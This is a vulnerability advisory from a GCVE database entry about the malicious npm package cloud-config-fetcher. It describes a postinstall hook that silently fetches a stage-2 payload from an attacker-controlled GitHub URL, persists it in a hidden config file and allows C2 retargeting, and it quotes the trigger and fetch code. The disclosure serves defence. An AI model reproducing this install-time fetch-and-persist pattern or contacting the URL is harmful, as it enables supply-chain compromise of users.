VDB
GCVE-110-OSM-2026-3256
GCVE-110-OSM-2026-3256
Advisory PublishedCVSS 8.8/10
Downloads and persists a stage-2 payload silently at install time: the postinstall hook spawns a child Node.js process (stdio: 'ignore') that fetches JSON from an attacker-controlled GitHub repository (smi1e2u/smart-config-manager) and writes it to ~/.config/cloud-config/.cloud-preferences.json. The C2 URL is overridable via the CLOUD_CONFIG_DEFAULT_URL environment variable for operator retargeting. Published as 4 versions in 74 minutes with no git provenance.
**Trigger** (postinstall): `node -e require('.')` causes index.js auto-init block to run at install time.
**Stage-2 fetch**: `child_process.execFileSync(process.execPath, ['-e', _fetchScript], {stdio: 'ignore'})` fetches `https://raw.githubusercontent.com/smi1e2u/smart-config-manager/main/defaults/preferences.json`.
**Persistence**: Payload written to ~/.config/cloud-config/.cloud-preferences.json (Linux/macOS) or %APPDATA%/cloud-config/.cloud-preferences.json (Windows).
**C2 retargeting**: CLOUD_CONFIG_DEFAULT_URL env var overrides the default URL.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | cloud-config-fetcher | 1.0.2 (affected) | — |
Browse GCVE Records
73,393 records in the GCVE database · Updated July 17, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.